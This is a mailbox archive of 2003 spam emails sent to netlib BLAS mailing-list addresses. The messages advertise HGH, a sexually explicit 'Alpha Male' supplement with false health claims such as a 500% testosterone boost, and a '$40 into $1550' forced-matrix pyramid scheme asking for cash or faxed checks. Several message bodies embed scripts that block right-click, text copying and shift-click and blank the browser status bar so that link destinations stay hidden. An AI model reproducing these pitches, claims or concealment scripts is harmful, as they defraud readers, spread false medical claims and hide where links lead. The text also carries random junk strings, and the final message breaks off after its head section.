Content-Type: multipart/alternative;
	boundary="..FB_.03.8A_AA"
X-Priority: 3
X-MSMail-Priority: Normal


--..FB_.03.8A_AA
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Young and Strong</title>
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>
<body bgcolor=3D"#003366" font color=3D"#000000" face=3D"verdana" link=3D#=
00FF00 alink=3D#00FF00 vlink=3D"#0000FF" text=3D"#FFFFFF">
<center>
  <p align=3D"center"><H4><font color=3D"#FFFFFF" face=3D"verdana">Medical=
ly Proven and Recognized Around the World<br>HGH<br>replenishes what TIME =
has taken away !</font></H4></center><CENTER><H5><font color=3D"#FFCC00" f=
ace=3D"verdana">Look Better and Feel Better !<br>
    Be Sexy and Athletic !<br>Increases your Energy *** Speeds up your Met=
abolism<br>Improves Mental Clarity and Thinking Abilities !</font></H5>
</center><center><H5><font color=3D"#FFCC00" face=3D"verdana">Part of the =
daily routines of:<br>
  Doctors, Celebrities, Models, Athletes, Politicians, and even World Lead=
ers !</font></H5></center>  
<center><H5><font color=3D"#FFCC00" face=3D"verdana">
    Time, stress, and aging REDUCE and EXHAUST <br> the very hormones we n=
eed to remain youthful and vibrant.<br>You can now REPLENISH what time has=
 taken away !<H4><font color=3D"#FFFFFF" face=3D"verdana">With
      Doctor Approved 
      HGH !</font></H4>
    </font></H5>
</center><center> 
<H3><font color=3D"#FFFF00" face=3D"verdana">60 day 100% Money-Back Guaran=
tee!</font></H3></center>


  <center><h3><a href=3D"http://www.fisha.biz/hgh/?buster">This way to loo=
k and feel better with HGH!!</a></h3>
</center>
</body>
</html>
v cjulrnmdca qts  
nxdbrr

--..FB_.03.8A_AA--


From gm31ex@unagipai.tis.co.jp Sat Dec  6 03:16:24 2003
Return-Path: <gm31ex@unagipai.tis.co.jp>
Received: from chcgil2-ar7-4-34-132-030.chcgil2.dsl-verizon.net (chcgil2-ar7-4-34-132-030.chcgil2.dsl-verizon.net [4.34.132.30])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB68FZMN017210
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 6 Dec 2003 03:15:57 -0500 (EST)
Received: from (HELO oeos) [86.156.182.154] by chcgil2-ar7-4-34-132-030.chcgil2.dsl-verizon.net with ESMTP id 9F043A4A372; Sat, 06 Dec 2003 06:05:34 -0200
Message-ID: <57$52tu744siwg1-mi-49zpcm6$k03b@l2zafaxye.pguy>
From: "Lakisha Nix" <gm31ex@unagipai.tis.co.jp>
Reply-To: "Lakisha Nix" <gm31ex@unagipai.tis.co.jp>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Have You Heard? oac
Date: Sat, 06 Dec 03 06:05:34 GMT
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="AA.43F6.1ED"
X-Priority: 3
X-MSMail-Priority: Normal


--AA.43F6.1ED
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>ad</title>
</head>
<body text=3D"#000000" bgcolor=3D"#66FFFF" link=3D"#0000EE" vlink=3D"#551A=
8B" alink=3D"#FF0000">

<center><b><font face=3D"Arial,Helvetica"><font color=3D"#000000"><font si=
ze=3D+2>Warning:&nbsp;
Do Not Delete This Without Reading First</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#000000"><font
size=3D=
-2>&nbsp;</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#3333FF"><font
size=3D=
+4>ENTER
THE MATRIX</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#000000"><font
size=3D=
-2>&nbsp;</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#000000"><font
size=3D=
+3>The
First <u>Guaranteed</u> Network Program</font></font></font></b>
<p><b><i><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font size=
=3D+3>Will
you make $50,000 in the next 6 months?</font></font></font></i></b>
<p><b><i><font face=3D"Arial,Helvetica">Probably not, but I can show you
how to turn <font size=3D+2>$40</font> into <font size=3D+2>$1550</font> i=
n
just a couple weeks.</font></i></b>
<br><b><i><font face=3D"Arial,Helvetica">&nbsp;And the best part is you ca=
n
do this as many times as you want</font></i></b>
<p><b><font face=3D"Arial,Helvetica"><font size=3D+1>This is a Fully Monit=
ored
and Automated</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font
size=3D=
+2>SUCCESS
'GUARANTEED' SYSTEM</font></font></font></b>
<br><font face=3D"Arial,Helvetica"><font color=3D"#000000">See details bel=
ow</font></font></center>

<p><br>
<center><table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D20 WIDTH=3D"420" B=
GCOLOR=3D"#FFFF99" >
<tr>
<td>
<li>
<b><font face=3D"Arial,Helvetica"><font size=3D+1>No Marketing or Sales Sk=
ills
Required</font></font></b></li>

<li>
<b><font face=3D"Arial,Helvetica"><font size=3D+1>No Monthly Fees</font></=
font></b></li>

<li>
<b><font face=3D"Arial,Helvetica"><font size=3D+1>No Phone Calls or Networ=
king
Necessary</font></font></b></li>
</td>
</tr>
</table></center>

<P><center><table BORDER CELLSPACING=3D0 CELLPADDING=3D20 WIDTH=3D"650" BG=
COLOR=3D"#FFFFFF" >
<tr>
<td>
<center><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font si=
ze=3D+2>THIS
SYSTEM WORKS FOR OTHERS,</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font
size=3D=
+2>AND
IT WILL WORK FOR YOU TOO!</font></font></font></b></center>

<p><font face=3D"Arial,Helvetica">You're going to love this, because our
system is pretty darn simple. It doesn't require any special skills, educa=
tion,
or work experience. Thousands of people have been earning money using this=

basic technique for years, so we decided to use it to help others. This
business is called Networking, and it basically involves people forwarding=

money to each other using multilevel principles. You don't need to call
or even talk to anyone because it's all done anonymously through the mail
or by fax.</font>
<p><font face=3D"Arial,Helvetica">Virtually anyone can earn alot of cash
money if they will follow the simple instructions we provide. There is
NO selling involved, and there's no need to bother your friends and neighb=
ors.&nbsp;</font>
<p><font face=3D"Arial,Helvetica">In order for you to do this, you'll need=

to get out of the old mindset that has been programmed into your subconsci=
ous
since childhood. We call this "stepping out of the box".&nbsp; We had to
do it, and you can do it too. Your old mindset will suggest that "easy
money" must involve some kind of trickery or illegal activity because ther=
e
"is no such thing". The only good money is that which is earned from the
sweat off your brow.</font>
<p><font face=3D"Arial,Helvetica">Does all this sound familiar? It's all
<b>BALONEY!</b>&nbsp;
This mindset was intended to keep you content as a "worker bee" while the
"honey farmer" reaps all the benefits from your hard work. As good as this=

program is, many people will pass it by based purely on this old mindset,
so you should make sure you're not one of the "worker bees". This program
will teach you how to become the "honey farmer"!</font>
<center>
<p><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font size=3D=
+1>YOU
ONLY MAKE 1 PAYMENT!</font></font></font></b></center>

<p><font face=3D"Arial,Helvetica">This is a one-shot payment program. This=

means that you only pay once, and there are no further payments needed.
There are no monthly payments, so no one is ever dropped from the program
for missing payments. Like most investments, you put a little money in
up front and receive your reward later. Everyone pays a single participati=
on
fee of $40 to join the program.</font>
<p><font face=3D"Arial,Helvetica">Of the $40 you pay to join, we send $10
to three people who are in your upline. (these are the 3 people
that joined this program before you.) This totals $30. Your three-level
upline includes the person who invited you into this program, the person
who invited them, and the person who invited them. This is the same way
you will make money ... other people join in your downline and pay their
uplines $10 each.</font>
<p><font face=3D"Arial,Helvetica">The remaining $10 from each $40 particip=
ation
fee is a one-time administrative fee, and it covers our overhead to manage=

the operation of the program. You never have to send us another penny!&nbs=
p;
This $10 administrative fee also provides you with a step-by-step Instruct=
ion
Book called '<B>Mastering The Matrix</B>'.  This gives you all the informa=
tion you'll need to be successful.
If you follow these instructions exactly, you can fill your matrix and
collect $1550 in just a couple weeks.  Our manual also shows you how to le=
verage multiple matrixes, generating multiple streams of revenue for an un=
limited income potential! Best of all, we'll show you how to do this witho=
ut any further investment on your part.</font>
<p><font face=3D"Arial,Helvetica">We'll also provide you with many sources=

that provide mailing lists and mailing services&nbsp; to help you get movi=
ng
quickly, if you so desire. There are many inexpensive ways to very easily
establish a money-producing network (without talking to anyone or mailing
letters), and this Instruction Book explains these techniques in great
detail as well.</font>
<p><font face=3D"Arial,Helvetica">Our program is called <b>The Matrix,</b>=

it is a 5X3 forced matrix program.&nbsp; In 'traditional' networking progr=
ams,
everyone sponsors as many people as they can, and everyone is pretty much
on their own (uni-level matrix).</font>
<p><font face=3D"Arial,Helvetica">In a forced matrix, however, each person=

can still sponsor as many people as they wish; but after sponsoring a spec=
ific
number of people, the additional people sponsored "overflow" to be placed
under the people in this person's lower levels. With our system, the maxim=
um
number of people sponsored before overflow is five.&nbsp; Your total Matri=
x
will consist of 155 people (5+25+125).</font>
<p><font face=3D"Arial,Helvetica">The primary reason for using a forced ma=
trix
is to automatically help those they sponsor, and it really works great
because it forces your downline to grow rapidly in a downward direction
<b>where
the bigger payoffs are!</b></font>
<p><font face=3D"Arial,Helvetica">You only need to recruit 5 members to co=
mplete
the first level of your downline, and you=FFFFFF92re done.&nbsp; You earn
$10 fo=
r
each of these, so after deducting the $40 fee you paid to join, you are
already $10 ahead! And best of all, the system runs on autopilot from ther=
e.&nbsp;
Those 5 new members recruit five new members each for 25 members in your
second level, and those 25 recruit 5 members each for 125 in your third
level.&nbsp; This brings your total to 155 downline members in your comple=
ted
matrix.&nbsp; You receive <b>$10</b> for each of them, giving you a <b>$15=
50</b>
return on your <b>$40</b> investment.&nbsp; That=FFFFFF92s a <b>3875=
%</b> return
on your money and a matrix of this size can be completed in just a couple
weeks, not months or years like other programs.&nbsp;</font>
<p><font face=3D"Arial,Helvetica">Each week we send you a Payment Report
(along with your cash payment) that shows - in detail - how much cash mone=
y
you have coming to you. This report will list all participants in all 3
levels of your downline who sent you a $10 cash payment for that particula=
r
week.&nbsp; You don=FFFFFF92t have to wait till your matrix is full before
you
get paid.&nbsp; As each person joins your Matrix, you collect <b>$10</b>.&=
nbsp;
This is paid out to you weekly until your matrix is filled, and you have
received a total of <b>$1550</b>.</font>
<p><font face=3D"Arial,Helvetica">Additionally, you can obtain complete pr=
intouts
of your entire downline (called your "Personal Genealogy Report") in sever=
al
different ways. One way to obtain a copy of your Personal Genealogy Report=

is using the Internet to see your entire downline in real time as it stand=
s
on any particular day. We upload the database to this website every day
so everyone can keep track of their progress on a daily basis, if they
so desire.</font>
<center>
<p><b><u><font face=3D"Arial,Helvetica">OUR FULLY AUTOMATED SYSTEM DOES IT=

ALL FOR YOU!</font></u></b></center>

<p><font face=3D"Arial,Helvetica">With <b>The Matrix</b> you get all the
expense and workload out of the way one time and that's it!&nbsp; Not ever=
yone
will see it this way and they are short on vision. They will join other
programs only because it may cost them a few dollars less to get started,
or they fall for the <b><i><font color=3D"#FF0000">Make $50,000 in just 6
months hype.</font></i></b>&nbsp; In the long run they end up paying a
lot more and lose out on making the big money that our members do.</font>
<center>
<p><b><font face=3D"Arial,Helvetica"><font size=3D+4>Get Started Right Now=
!</font></font></b>
<br>
<hr WIDTH=3D"80%"></center>

<p><b><font face=3D"Arial,Helvetica"><font size=3D+1>1. Print This Page</f=
ont></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+1>2. Fill out the form=

below</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+1>3. Mail or Fax back =
to
us along with your $40 payment&nbsp;</font></font></b>
<center>
<p><font face=3D"Arial,Helvetica">&nbsp;<b><font color=3D"#FF0000"><font s=
ize=3D+2>Two
Ways To Join!</font></font></b></font></center>

<center><table BORDER=3D2 CELLSPACING=3D0 CELLPADDING=3D5 COLS=3D2
WIDTH=3D=
"100%" BGCOLOR=3D"#FFFFCC" >
<tr>
<td ALIGN=3DLEFT VALIGN=3DTOP WIDTH=3D"50%">
<center><b><font face=3D"Arial,Helvetica">Join By Mail Instructions:</font=
></b>
<p><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000">BayMarketing<=
/font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000">(Sponsor ID:=
1005)&nbsp;</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000">P.O. Box 319=
&nbsp;</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000">Kure Beach, =
NC
28449</font></font></b>
<p><b><font face=3D"Arial,Helvetica"><font size=3D-1>Include Payment of $4=
0
in the form of:</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Check, Cash or Money=

Order</font></font></b></center>
</td>

<td ALIGN=3DLEFT VALIGN=3DTOP WIDTH=3D"50%">
<center><b><font face=3D"Arial,Helvetica">Join By Fax Instructions:&nbsp;<=
/font></b>
<p><b><font face=3D"Arial,Helvetica"><font size=3D-1>Take a Personal or Co=
mpany
Check (US Only) in the amount of $40, made out to BayMarketing.&nbsp; Tape=

it to this page (below your contact information) and fax to:</font></font>=
</b>
<p><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000">1-443-238-149=
8</font></font></b></center>
</td>
</tr>
</table></center>

<center>
<p><b><font face=3D"Arial,Helvetica">Sponsor ID: 1005</font></b></center>

<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 COLS=3D2 WIDTH=3D"60=
0" >
<tr>
<td WIDTH=3D"40%"><b><font face=3D"Arial,Helvetica">First Name</font></b><=
/td>

<td WIDTH=3D"60%"><b><font face=3D"Arial,Helvetica">&nbsp;</font></b></td>=

</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica">Last Name</font></b></td>

<td><b><font face=3D"Arial,Helvetica">&nbsp;</font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica">Mailing Address (line 1)</font></b><=
/td>

<td><b><font face=3D"Arial,Helvetica">&nbsp;</font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica">Mailing Address (line 2)</font></b><=
/td>

<td><b><font face=3D"Arial,Helvetica">&nbsp;</font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica">City, State Zip</font></b></td>

<td><b><font face=3D"Arial,Helvetica">&nbsp;</font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica">Country</font></b></td>

<td><b><font face=3D"Arial,Helvetica">&nbsp;</font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica">Phone Number <font size=3D-1>(with a=
rea
code)</font></font></b></td>

<td><b><font face=3D"Arial,Helvetica">&nbsp;</font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica">Email Address <font size=3D-1>(requi=
red)</font></font></b></td>

<td>&nbsp;</td>
</tr>
</table></center>

<center><b><font face=3D"Arial,Helvetica"><font size=3D-1>Your set-up info=
rmation
will be sent to your email address upon receipt of your order</font></font=
></b>
<br>&nbsp;
<br>&nbsp;
<p><font face=3D"Arial,Helvetica">[Attach Check by Fax Here]</font></cente=
r>

<p><br>
<br>
<br>
<br>
<p>
<hr WIDTH=3D"80%">
<center><b><font face=3D"Arial,Helvetica"><font color=3D"#3333FF"><font si=
ze=3D-1>THE
MONITORS OFFICE CONTACTS EVERY NEW MEMBER, INCLUDING YOU. THEY CONTACT YOU=
 TO
VERIFY THAT YOU UNDERSTAND HOW THE PROGRAM WORKS AND TO OFFER YOU ANY ASSI=
STANCE
REQUIRED.&nbsp; NO OTHER PROGRAM SPENDS THE TIME OR EXPENSE TO</font></fon=
t></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#3333FF"><font
size=3D=
-1>WELCOME
EVERY NEW MEMBER ONBOARD LIKE THIS ONE DOES</font></font></font></b></cent=
er>

<hr WIDTH=3D"80%">
<br>&nbsp;
<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D10 COLS=3D1 WIDTH=3D"9=
0%" BGCOLOR=3D"#FFFFCC" >
<tr>
<td><b><font face=3D"Arial,Helvetica"><font size=3D-1>To be in compliance =
with
Federal Postal Laws (Title 18, Sections 1302/1341) network programs must
have a viable product or service to sell and someone to oversee the operat=
ion.</font></font></b>
<p><font face=3D"Arial,Helvetica"><font size=3D-1><b>The Service: </b>We p=
rovide
a fully automated, monitored program.&nbsp; We maintain a database of all
members, ensuring that our members adhere to-the rules.&nbsp; We provide
marketing and sales services as well as timely processing of our members
applications</font></font>
<p><font face=3D"Arial,Helvetica"><font size=3D-1><b>The Products: </b>Eac=
h
new member receves a step by step Instruction Book (Mastering the Matrix) =
that walks them through
the successful completion of this program.&nbsp; If you follow these easy
step by step instructions, <B>you will make Money.</B> The skills you lear=
n in Mastering the Matrix will work with any network program you ever part=
icipate in.  This book alone is worth more than the entrance fee into this=
 program</font></font></td>
</tr>
</table></center>
</td>
</tr>
</table></center>

<P><center><table BORDER CELLSPACING=3D0 CELLPADDING=3D10 COLS=3D1
WIDTH=3D=
"650" >
<tr>
<td BGCOLOR=3D"#FFFFFF">
<center><b><i><font face=3D"Arial,Helvetica"><font size=3D+2>OUR SUCCESS G=
UARANTEE</font></font></i></b>
<hr WIDTH=3D"80%"></center>
<font face=3D"Arial,Helvetica"><font size=3D-1>If you followed the step by=

step directions in our Instruction Book for success, and you still haven't=

picked up your 5 first level members. (<i>I can't imagine</i>)&nbsp; We
worked out a special deal with the marketing company below.&nbsp; They
will email your ad out to one million people for a highly reduced rate
and guarantee your performance.&nbsp; If after this mailing, you still
haven't filled your (5) first level members, they will continue to mail
your ad at no additional cost
<b>UNTIL YOU DO!</b> This is a special limited
time offer available only to the recipients of this email ad</font></font>=
</td>
</tr>
</table></center>

<P><center><table BORDER CELLSPACING=3D0 CELLPADDING=3D0 COLS=3D1 WIDTH=3D=
"650" BGCOLOR=3D"#FFFFCC" >
<tr>
<td>
<center><font face=3D"Arial,Helvetica">Bulk Email Marketing Services provi=
ded
by Rapidmail 2003</font>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+3><font color=3D"#FF00=
00">EXPLODE
</font>Y<font color=3D"#000000">our
Profits</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+2>With 24/7 Dedicated =
Bulk
Email Servers!</font></font></b>
<br>
<hr WIDTH=3D"80%">
<br><font face=3D"Arial,Helvetica"><font size=3D+3>Bulk Email can EXPLODE =
your
Profits!</font></font>
<p><b><font face=3D"Arial,Helvetica"><font size=3D+1>Get a Dedicated Bulk =
Email
Server sending out your ad</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+1>24 hours a day, 7 da=
ys
a week!</font></font></b>
<p><b><font face=3D"Arial,Helvetica"><font size=3D+3>Call 1-800-591-7751&n=
bsp;
ext:101</font></font></b></center>
</td>
</tr>
</table></center>
<A HREF=3D"http://www.herbalplus.us/out.html">Click Here to be removed</A>=

<br>&nbsp;
</body>
</html>
izhzqglqnkelzjosqcrkp haoxyci 
o

--AA.43F6.1ED--


From luthertubbs@msn.com Mon Dec  8 04:57:29 2003
Return-Path: <luthertubbs@msn.com>
Received: from c211-30-153-25.blktn3.nsw.optusnet.com.au (c211-30-153-25.blktn3.nsw.optusnet.com.au [211.30.153.25])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB89vKMN015062;
	Mon, 8 Dec 2003 04:57:24 -0500 (EST)
Received: from [36.94.79.172] by c211-30-153-25.blktn3.nsw.optusnet.com.au id <8526786-19442>; Mon, 08 Dec 2003 04:49:13 -0500
Message-ID: <3-a$e58x$b$p$5-ven$-837t6@s4weth>
From: "Jolene Mccarthy" <luthertubbs@msn.com>
Reply-To: "Jolene Mccarthy" <luthertubbs@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: You and alpha will blow her mind jgvgdgfyrz
Date: Mon, 08 Dec 03 04:49:13 GMT
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="63.F2_99C9EDF923.98D3A."
X-Priority: 3
X-MSMail-Priority: Normal


--63.F2_99C9EDF923.98D3A.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>
    She'll never leave you alone when you give her hours of multiple orgas=
ms.<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://herbalworld.biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbust=
er">Find Alpha Male Here</a></h2></center>

</body>
</html>
af drb
dbkib n
 pn flfdzsbbilajfy jziubvfinzpdbe
af le m zsi
dt 

--63.F2_99C9EDF923.98D3A.--


From luthertubbs@msn.com Mon Dec  8 05:48:07 2003
Return-Path: <luthertubbs@msn.com>
Received: from ool-182c1624.dyn.optonline.net (ool-182c1624.dyn.optonline.net [24.44.22.36])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB8Am6MN016816;
	Mon, 8 Dec 2003 05:48:06 -0500 (EST)
Received: from [232.240.204.82] by ool-182c1624.dyn.optonline.net with ESMTP id 03B106AC41A; Mon, 08 Dec 2003 08:40:52 -0200
Message-ID: <fzbi3jq$5gzx3@cnf6f>
From: "Ismael Carey" <luthertubbs@msn.com>
Reply-To: "Ismael Carey" <luthertubbs@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Anybody can do it, can you do it fantastic? ofxowgrvgbx
Date: Mon, 08 Dec 03 08:40:52 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="BC7A04_91671"
X-Priority: 3
X-MSMail-Priority: Normal


--BC7A04_91671
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>
